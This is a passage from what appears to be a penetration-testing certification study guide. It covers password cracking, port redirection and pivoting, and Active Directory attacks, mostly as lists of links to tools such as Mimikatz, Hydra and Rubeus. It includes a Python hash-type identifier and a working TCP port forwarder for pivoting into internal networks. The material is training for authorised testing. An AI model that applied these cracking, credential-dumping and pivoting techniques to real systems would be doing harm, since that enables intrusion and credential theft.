  &lt;li&gt;Main Link: &lt;a href=&quot;https://in.security/lin-security-practise-your-linux-privilege-escalation-foo/&quot;&gt;https://in.security/lin-security-practise-your-linux-privilege-escalation-foo/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Backup: &lt;a href=&quot;https://www.vulnhub.com/entry/linsecurity-1,244/&quot;&gt;https://www.vulnhub.com/entry/linsecurity-1,244/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;section-16-password-cracking&quot;&gt;Section 16: Password Cracking&lt;/h1&gt;
&lt;p&gt;In this section you need to understand the basics of password attacks: the differences between Windows (NTLM) hashes and Linux (crypt) hashes, and the tools you can use for online and offline password attacks. An online attack sends guesses to the live authentication service, such as a web form or SSH; it is slow, it is logged, and it may lock accounts out, so keep the wordlist small. An offline attack runs locally against a captured hash, for example using John the Ripper to crack a password-protected zip file on your own machine, at whatever speed your hardware allows.
Here is a list of resources that I have used that helped me better understand how password cracking works:&lt;/p&gt;

&lt;p&gt;Introduction to Password Cracking: &lt;a href=&quot;https://alexandreborgesbrazil.files.wordpress.com/2013/08/introduction_to_password_cracking_part_1.pdf&quot;&gt;https://alexandreborgesbrazil.files.wordpress.com/2013/08/introduction_to_password_cracking_part_1.pdf&lt;/a&gt;&lt;/p&gt;

&lt;h5 id=&quot;offline-tools-for-password-cracking&quot;&gt;Offline Tools for Password Cracking:&lt;/h5&gt;
&lt;ul&gt;
  &lt;li&gt;
    &lt;p&gt;Hashcat: &lt;a href=&quot;https://hashcat.net/hashcat/&quot;&gt;https://hashcat.net/hashcat/&lt;/a&gt; 
Sample Hashes to test with Hashcat: &lt;a href=&quot;https://hashcat.net/wiki/doku.php?id=example_hashes&quot;&gt;https://hashcat.net/wiki/doku.php?id=example_hashes&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;John the Ripper: &lt;a href=&quot;https://www.openwall.com/john/&quot;&gt;https://www.openwall.com/john/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Metasploit Unleashed using John the Ripper with Hashdump: &lt;a href=&quot;https://www.offensive-security.com/metasploit-unleashed/john-ripper/&quot;&gt;https://www.offensive-security.com/metasploit-unleashed/john-ripper/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Online Tools for Password Cracking:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;
    &lt;p&gt;THC Hydra: &lt;a href=&quot;https://github.com/vanhauser-thc/thc-hydra&quot;&gt;https://github.com/vanhauser-thc/thc-hydra&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Crowbar: &lt;a href=&quot;https://github.com/galkan/crowbar&quot;&gt;https://github.com/galkan/crowbar&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Wordlist generators:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Cewl: &lt;a href=&quot;https://digi.ninja/projects/cewl.php&quot;&gt;https://digi.ninja/projects/cewl.php&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Crunch: &lt;a href=&quot;https://tools.kali.org/password-attacks/crunch&quot;&gt;https://tools.kali.org/password-attacks/crunch&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Cupp (In Kali Linux): &lt;a href=&quot;https://github.com/Mebus/cupp&quot;&gt;https://github.com/Mebus/cupp&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Tools to check the hash type:&lt;/p&gt;

&lt;p&gt;hashID: &lt;a href=&quot;https://github.com/psypanda/hashID&quot;&gt;https://github.com/psypanda/hashID&lt;/a&gt; (it can also print the matching hashcat mode and john format; remember that any 32-hex string looks the same whether it is MD5, NTLM or LM, so let the source of the hash decide)&lt;/p&gt;
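&lt;p&gt;Identifying what you captured before you pick a tool, as an added example written for this page (not hashID’s code). It makes the point above concrete: a Windows NTLM hash and a Linux crypt(3) hash are different things with different cracking modes, and the one trap the script calls out is that a bare 32-hex string cannot be told apart from MD5, NTLM or LM by shape alone, so where it came from (a hashdump line, /etc/shadow, a Responder capture) has to settle it. The hashcat mode numbers and john format names are real; the sample lines are constructed, apart from the well-known LM/NT values for an empty password and for the password &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;password&lt;/code&gt;.&lt;/p&gt;

```python
import re

HEX = {n: re.compile(r"^[0-9a-fA-F]{%d}$" % n) for n in (16, 32, 40, 48, 64)}

# label, hashcat -m, john --format for the crypt(3) prefixes found in /etc/shadow
CRYPT_PREFIXES = {
    "$1$":  ("md5crypt",    500,  "md5crypt"),
    "$5$":  ("sha256crypt", 7400, "sha256crypt"),
    "$6$":  ("sha512crypt", 1800, "sha512crypt"),
    "$2a$": ("bcrypt",      3200, "bcrypt"),
    "$2b$": ("bcrypt",      3200, "bcrypt"),
    "$2y$": ("bcrypt",      3200, "bcrypt"),
    "$y$":  ("yescrypt",    None, "crypt"),   # no hashcat mode; john goes through libxcrypt
}
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"     # LM field of an account with no LM hash stored


def _hex(s, n):
    return bool(HEX[n].match(s))


def identify(line):
    """Classify one line of captured material.  Returns a list of
    (label, hashcat mode, john format, hash); more than one entry means the
    line alone does not determine the algorithm and the source must decide."""
    line = line.strip()
    f = line.split(":")
    # /etc/shadow line or a bare crypt(3) string: the $id$ prefix is authoritative
    for field in f[:2]:
        for prefix, (label, mode, fmt) in CRYPT_PREFIXES.items():
            if field.startswith(prefix):
                return [(label, mode, fmt, field)]
    # pwdump / hashdump / secretsdump: user:rid:LM:NT:::
    if len(f) >= 4 and f[1].isdigit() and _hex(f[2], 32) and _hex(f[3], 32):
        out = [("NTLM", 1000, "nt", f[3].lower())]
        if f[2].lower() != EMPTY_LM:
            out.insert(0, ("LM", 3000, "lm", f[2].lower()))
        return out
    # captured challenge/response (Responder and friends): user::DOMAIN:challenge:response:blob
    if len(f) >= 6 and f[1] == "":
        if _hex(f[3], 16) and _hex(f[4], 32):
            return [("NetNTLMv2", 5600, "netntlmv2", line)]
        if _hex(f[3], 48) and _hex(f[4], 48) and _hex(f[5], 16):
            return [("NetNTLMv1", 5500, "netntlm", line)]
    # bare hex: length alone cannot tell MD5 from NTLM from LM
    if _hex(line, 32):
        return [("MD5", 0, "raw-md5", line.lower()),
                ("NTLM", 1000, "nt", line.lower()),
                ("LM", 3000, "lm", line.lower())]
    if _hex(line, 40):
        return [("SHA-1", 100, "raw-sha1", line.lower())]
    if _hex(line, 64):
        return [("SHA-256", 1400, "raw-sha256", line.lower())]
    return []


# Constructed inputs: the LM/NT values are the well-known hashes of an empty password
# and of "password"; the sha512crypt body and the NetNTLMv2 response are made-up hex.
SAMPLES = [
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "bob:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::",
    "svc:$6$Z1vU3mN2$CONSTRUCTEDHASHBODYCONSTRUCTEDHASHBODYCONSTRUCTEDHASHBODYCONSTRUCT:19000:0:99999:7:::",
    "alice::CORP:1122334455667788:0123456789abcdef0123456789abcdef:0101000000000000c0653150de09b201",
    "5f4dcc3b5aa765d61d8327deb882cf99",
]

if __name__ == "__main__":
    for s in SAMPLES:
        for label, mode, fmt, h in identify(s):
            print("%-11s hashcat -m %-5s john --format=%-12s %s" % (label, mode, fmt, h[:40]))
```

&lt;p&gt;Feed the result straight into &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;hashcat -m MODE hashes.txt wordlist&lt;/code&gt; or &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;john --format=FORMAT hashes.txt&lt;/code&gt;. When the script returns more than one row, try the algorithm that matches where the hash came from first; hashcat given the wrong mode simply never cracks it.&lt;/p&gt;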

&lt;p&gt;Tools to dump hashes:&lt;/p&gt;

&lt;p&gt;Mimikatz: &lt;a href=&quot;https://github.com/gentilkiwi/mimikatz&quot;&gt;https://github.com/gentilkiwi/mimikatz&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Mimipenguin: &lt;a href=&quot;https://github.com/huntergregal/mimipenguin&quot;&gt;https://github.com/huntergregal/mimipenguin&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Pypykatz: &lt;a href=&quot;https://github.com/skelsec/pypykatz&quot;&gt;https://github.com/skelsec/pypykatz&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Wordlists:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;In Kali: /usr/share/wordlists&lt;/li&gt;
  &lt;li&gt;SecLists: apt-get install seclists 
 You can find all of the SecLists password lists here: &lt;a href=&quot;https://github.com/danielmiessler/SecLists/tree/master/Passwords&quot;&gt;https://github.com/danielmiessler/SecLists/tree/master/Passwords&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Xajkep Wordlists: &lt;a href=&quot;https://github.com/xajkep/wordlists&quot;&gt;https://github.com/xajkep/wordlists&lt;/a&gt;&lt;/p&gt;

&lt;h5 id=&quot;online-password-crackers&quot;&gt;Online Password Crackers:&lt;/h5&gt;
&lt;p&gt;Confusingly these are also called online crackers, but they are lookup tables of precomputed hashes (wordlists that have already been hashed) or GPU services that break hashes for you. I usually tried these first to see whether the hash was already in their database. Do not make them your main tool, though: uploading a hash from an engagement hands client material to a third party, and the cleartext, once found, sits in their database, so crack engagement hashes with your offline tools. Here is a list of online hash crackers that you can use:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://hashkiller.io/listmanager&quot;&gt;https://hashkiller.io/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.cmd5.org/&quot;&gt;https://www.cmd5.org/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.onlinehashcrack.com/&quot;&gt;https://www.onlinehashcrack.com/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://gpuhash.me/&quot;&gt;https://gpuhash.me/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://crackstation.net/&quot;&gt;https://crackstation.net/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://passwordrecovery.io/&quot;&gt;https://passwordrecovery.io/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://md5decrypt.net/en/&quot;&gt;https://md5decrypt.net/en/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://hashes.com/en/decrypt/hash&quot;&gt;https://hashes.com/en/decrypt/hash&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;http://cracker.offensive-security.com/&quot;&gt;http://cracker.offensive-security.com/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Other Resources for Password Cracking:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Pwning Wordpress Passwords: &lt;a href=&quot;https://medium.com/bugbountywriteup/pwning-wordpress-passwords-2caf12216956&quot;&gt;https://medium.com/bugbountywriteup/pwning-wordpress-passwords-2caf12216956&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;section-17-port-redirection-and-pivoting&quot;&gt;Section 17: Port Redirection and Pivoting&lt;/h1&gt;
&lt;p&gt;Depending on your scope, some machines may not be directly reachable. Dual-homed systems, with one interface on the network you can reach and another on an internal one, let you pivot into that internal network. You will need some of these techniques to reach those non-public networks:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Abatchy’s Port Forwarding Guide: &lt;a href=&quot;https://www.abatchy.com/2017/01/port-forwarding-practical-hands-on-guide&quot;&gt;https://www.abatchy.com/2017/01/port-forwarding-practical-hands-on-guide&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Windows Port Forwarding: &lt;a href=&quot;http://woshub.com/port-forwarding-in-windows/&quot;&gt;http://woshub.com/port-forwarding-in-windows/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;SSH Tunnelling Explained: &lt;a href=&quot;https://chamibuddhika.wordpress.com/2012/03/21/ssh-tunnelling-explained/&quot;&gt;https://chamibuddhika.wordpress.com/2012/03/21/ssh-tunnelling-explained/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Understanding Proxy Tunnels: &lt;a href=&quot;https://www.offensive-security.com/metasploit-unleashed/proxytunnels/&quot;&gt;https://www.offensive-security.com/metasploit-unleashed/proxytunnels/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Understanding Port forwarding with Metasploit: &lt;a href=&quot;https://www.offensive-security.com/metasploit-unleashed/portfwd/&quot;&gt;https://www.offensive-security.com/metasploit-unleashed/portfwd/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Explore Hidden Networks with Double Pivoting: &lt;a href=&quot;https://pentest.blog/explore-hidden-networks-with-double-pivoting/&quot;&gt;https://pentest.blog/explore-hidden-networks-with-double-pivoting/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;0xdf hacks stuff. Pivoting and Tunnelling: &lt;a href=&quot;https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html&quot;&gt;https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
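&lt;p&gt;What the tunnelling guides above set up with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ssh -L&lt;/code&gt;, Metasploit &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;portfwd&lt;/code&gt; or chisel, reduced to its core: a userland TCP port redirector. This is an added example written for this page and not code from any of the tools linked here. It listens on one address and splices each accepted connection to a target, so a service that only the pivot host can reach is exposed on a port you choose. The echo server is a constructed stand-in for the internal-only service, and the addresses in the main block are placeholders.&lt;/p&gt;

```python
import socket
import threading
import time


def _pump(src, dst):
    """Copy bytes from src to dst until src closes, then half-close dst so the
    far end sees end-of-stream instead of hanging."""
    try:
        while True:
            chunk = src.recv(65536)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _bridge(client, target):
    """Connect to the target and relay both directions, one thread each."""
    try:
        remote = socket.create_connection(target, timeout=5)
    except OSError:
        client.close()
        return
    remote.settimeout(None)
    threading.Thread(target=_pump, args=(client, remote), daemon=True).start()
    threading.Thread(target=_pump, args=(remote, client), daemon=True).start()


def start_forwarder(listen_host, listen_port, target_host, target_port):
    """Listen on listen_host:listen_port and relay every connection to target_host:target_port.
    Returns the listening socket; getsockname() on it gives the bound port (handy with port 0)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((listen_host, listen_port))
    srv.listen(32)

    def accept_loop():
        while True:
            try:
                client, _ = srv.accept()
            except OSError:          # listener closed
                return
            threading.Thread(target=_bridge, args=(client, (target_host, target_port)),
                             daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv


def start_echo_server():
    """Constructed stand-in for the internal-only service: echoes whatever it receives."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(8)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=_pump, args=(conn, conn), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv


def relay_roundtrip(payload):
    """Send payload through a forwarder to the echo server and return what came back."""
    echo = start_echo_server()
    fwd = start_forwarder("127.0.0.1", 0, "127.0.0.1", echo.getsockname()[1])
    try:
        with socket.create_connection(fwd.getsockname(), timeout=5) as c:
            c.sendall(payload)
            c.shutdown(socket.SHUT_WR)        # we are done sending; wait for the echo
            chunks = []
            while True:
                chunk = c.recv(65536)
                if not chunk:
                    break
                chunks.append(chunk)
            return b"".join(chunks)
    finally:
        fwd.close()
        echo.close()


if __name__ == "__main__":
    # Placeholder addresses: expose internal-only 10.10.10.5:445 on this host's port 4445,
    # the equivalent of meterpreter's  portfwd add -l 4445 -p 445 -r 10.10.10.5
    listener = start_forwarder("0.0.0.0", 4445, "10.10.10.5", 445)
    print("relaying", listener.getsockname(), "to 10.10.10.5:445")
    while True:
        time.sleep(60)
```

&lt;p&gt;Run it on the dual-homed host after editing the addresses, then point your tools at the listening port. Nothing here is encrypted, so prefer an SSH tunnel wherever sshd is available, and remember that a new listener is a change to the host that the blue team can see with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;netstat -ano&lt;/code&gt; or &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ss -ltnp&lt;/code&gt;, so bind to a single interface and tear it down when you are done.&lt;/p&gt;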

&lt;p&gt;Tools to help you with Port Forwarding and Pivoting:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Proxychains: &lt;a href=&quot;https://github.com/haad/proxychains&quot;&gt;https://github.com/haad/proxychains&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Proxychains-ng: &lt;a href=&quot;https://github.com/rofl0r/proxychains-ng&quot;&gt;https://github.com/rofl0r/proxychains-ng&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;SSHuttle (Totally Recommend learning this): &lt;a href=&quot;https://github.com/sshuttle/sshuttle&quot;&gt;https://github.com/sshuttle/sshuttle&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;SSHuttle Documentation: &lt;a href=&quot;https://sshuttle.readthedocs.io/en/stable/&quot;&gt;https://sshuttle.readthedocs.io/en/stable/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Chisel &lt;a href=&quot;https://github.com/jpillora/chisel&quot;&gt;https://github.com/jpillora/chisel&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Ligolo: &lt;a href=&quot;https://github.com/sysdream/ligolo&quot;&gt;https://github.com/sysdream/ligolo&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Online Tunnelling Services:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Ngrok: &lt;a href=&quot;https://ngrok.com/&quot;&gt;https://ngrok.com/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Twilo: &lt;a href=&quot;https://www.twilio.com&quot;&gt;https://www.twilio.com/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Vulnerable systems to practice pivoting:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Wintermute: &lt;a href=&quot;https://www.vulnhub.com/entry/wintermute-1,239/&quot;&gt;https://www.vulnhub.com/entry/wintermute-1,239/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;section-18-active-directory-attacks&quot;&gt;Section 18: Active Directory Attacks&lt;/h1&gt;

&lt;p&gt;This was a new section that I was really looking forward to learning about when the new update was released! Active Directory is a popular service that we see running in the real world because it helps system administrators manage their systems, users, services, and much more depending on the size of their organisation.&lt;/p&gt;

&lt;p&gt;Active Directory Domain Services can be installed on Windows Server (2000-2019). I highly encourage you to make some time to learn how to install Active Directory on a Windows Server (version of your liking). This will help you get an understanding how to setup your own Active Directory Environment as well.&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Fundamentals of Active Directory: &lt;a href=&quot;https://www.youtube.com/watch?v=GfqsFtmJQg0&amp;amp;feature=emb_logo&quot;&gt;https://www.youtube.com/watch?v=GfqsFtmJQg0&amp;amp;feature=emb_logo&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I have provided some resources to help you get started:&lt;/p&gt;

&lt;p&gt;Setting up Active Directory:&lt;/p&gt;

&lt;p&gt;Note: Make sure when you are setting up the Active Directory server that you assign it a static IP address, and also set up a workstation that you will join to the domain for further testing. I recommend a Windows 10 workstation if you plan to use Windows Server 2016/2019.&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Microsoft Documentation to install Active Directory: &lt;a href=&quot;https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/deploy/install-active-directory-domain-services--level-100-&quot;&gt;https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/deploy/install-active-directory-domain-services--level-100-&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Install Windows Active Directory on Windows Server 2019: &lt;a href=&quot;https://computingforgeeks.com/how-to-install-active-directory-domain-services-in-windows-server/&quot;&gt;https://computingforgeeks.com/how-to-install-active-directory-domain-services-in-windows-server/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Understanding Users Accounts in Active Directory: &lt;a href=&quot;https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-accounts&quot;&gt;https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-accounts&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Three ways to create an Active Directory User: &lt;a href=&quot;https://petri.com/3-ways-to-create-new-active-directory-users&quot;&gt;https://petri.com/3-ways-to-create-new-active-directory-users&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Join a Workstation to the Domain: &lt;a href=&quot;https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/join-a-computer-to-a-domain&quot;&gt;https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/join-a-computer-to-a-domain&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Tools to help you automate the installation for Active Directory:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;ADLab: &lt;a href=&quot;https://github.com/browninfosecguy/ADLab&quot;&gt;https://github.com/browninfosecguy/ADLab&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Automated Lab: &lt;a href=&quot;https://github.com/AutomatedLab/AutomatedLab&quot;&gt;https://github.com/AutomatedLab/AutomatedLab&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;MSLab: &lt;a href=&quot;https://github.com/microsoft/MSLab&quot;&gt;https://github.com/microsoft/MSLab&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Invoke-ADLabDeployer: &lt;a href=&quot;https://github.com/outflanknl/Invoke-ADLabDeployer&quot;&gt;https://github.com/outflanknl/Invoke-ADLabDeployer&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Active Directory User Setup: &lt;a href=&quot;https://github.com/bjiusc/Active-Directory-User-Setup-Script&quot;&gt;https://github.com/bjiusc/Active-Directory-User-Setup-Script&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Enumerating Active Directory:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Active Directory Enumeration with Powershell: &lt;a href=&quot;https://www.exploit-db.com/docs/english/46990-active-directory-enumeration-with-powershell.pdf&quot;&gt;https://www.exploit-db.com/docs/english/46990-active-directory-enumeration-with-powershell.pdf&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Active Directory Exploitation Cheat Sheet: &lt;a href=&quot;https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet#domain-enumeration&quot;&gt;https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet#domain-enumeration&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Powersploit: &lt;a href=&quot;https://github.com/PowerShellMafia/PowerSploit&quot;&gt;https://github.com/PowerShellMafia/PowerSploit&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Understanding Authentication protocols that Active Directory Utilizes:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;NTLM Authentication: &lt;a href=&quot;https://docs.microsoft.com/en-us/troubleshoot/windows-server/windows-security/ntlm-user-authentication&quot;&gt;https://docs.microsoft.com/en-us/troubleshoot/windows-server/windows-security/ntlm-user-authentication&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Kerberos Authentication &lt;a href=&quot;https://docs.microsoft.com/en-us/windows-server/security/kerberos/kerberos-authentication-overview&quot;&gt;https://docs.microsoft.com/en-us/windows-server/security/kerberos/kerberos-authentication-overview&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Cache and Stored Credentials: &lt;a href=&quot;https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v=ws.11)&quot;&gt;https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v=ws.11)&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Group Managed Service Accounts: &lt;a href=&quot;https://adsecurity.org/?p=4367&quot;&gt;https://adsecurity.org/?p=4367&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Lateral Movement in Active Directory:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Paving the Way to DA: &lt;a href=&quot;https://blog.zsec.uk/path2da-pt1/&quot;&gt;https://blog.zsec.uk/path2da-pt1&lt;/a&gt;
    &lt;ul&gt;
      &lt;li&gt;&lt;a href=&quot;https://blog.zsec.uk/path2da-pt2&quot;&gt;Part 2&lt;/a&gt;, &lt;a href=&quot;https://blog.zsec.uk/path2da-pt3&quot;&gt;3&lt;/a&gt;&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/li&gt;
  &lt;li&gt;Pass the Hash with Machine Accounts: &lt;a href=&quot;https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/pass-the-hash-with-machine-accounts&quot;&gt;https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/pass-the-hash-with-machine-accounts&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Overpass the hash (Payload All the things): &lt;a href=&quot;https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#overpass-the-hash-pass-the-key&quot;&gt;https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#overpass-the-hash-pass-the-key&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Red Team Adventures Overpass the Hash: &lt;a href=&quot;https://riccardoancarani.github.io/2019-10-04-lateral-movement-megaprimer/#overpass-the-hash&quot;&gt;https://riccardoancarani.github.io/2019-10-04-lateral-movement-megaprimer/#overpass-the-hash&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Pass the Ticket (Silver Tickets): &lt;a href=&quot;https://adsecurity.org/?p=2011&quot;&gt;https://adsecurity.org/?p=2011&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Lateral Movement with DCOM: &lt;a href=&quot;https://www.ired.team/offensive-security/lateral-movement/t1175-distributed-component-object-model&quot;&gt;https://www.ired.team/offensive-security/lateral-movement/t1175-distributed-component-object-model&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Active Directory Privilege Escalation and Persistence:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Cracking Kerberos TGS Tickets Using Kerberoast: &lt;a href=&quot;https://adsecurity.org/?p=2293&quot;&gt;https://adsecurity.org/?p=2293&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Kerberoasting Without Mimikatz: &lt;a href=&quot;https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/&quot;&gt;https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Golden Tickets: &lt;a href=&quot;https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets&quot;&gt;https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Pass the Ticket (Golden Tickets): &lt;a href=&quot;https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#pass-the-ticket-golden-tickets&quot;&gt;https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#pass-the-ticket-golden-tickets&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Understanding DCSync Attacks: &lt;a href=&quot;https://attack.stealthbits.com/privilege-escalation-using-mimikatz-dcsync&quot;&gt;https://attack.stealthbits.com/privilege-escalation-using-mimikatz-dcsync&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Tools for Active Directory Enumeration, Lateral Movement and Persistence:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;ADRecon: &lt;a href=&quot;https://github.com/sense-of-security/ADRecon&quot;&gt;https://github.com/sense-of-security/ADRecon&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Kerbrute: &lt;a href=&quot;https://github.com/ropnop/kerbrute&quot;&gt;https://github.com/ropnop/kerbrute&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Rubeus: &lt;a href=&quot;https://github.com/GhostPack/Rubeus&quot;&gt;https://github.com/GhostPack/Rubeus&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Impacket: &lt;a href=&quot;https://github.com/SecureAuthCorp/impacket&quot;&gt;https://github.com/SecureAuthCorp/impacket&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Other Resources:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Building an Active Directory with PowerShell: &lt;a href=&quot;https://1337red.wordpress.com/building-and-attacking-an-active-directory-lab-with-powershell/&quot;&gt;https://1337red.wordpress.com/building-and-attacking-an-active-directory-lab-with-powershell/&lt;/a&gt;&lt;/li&gt;
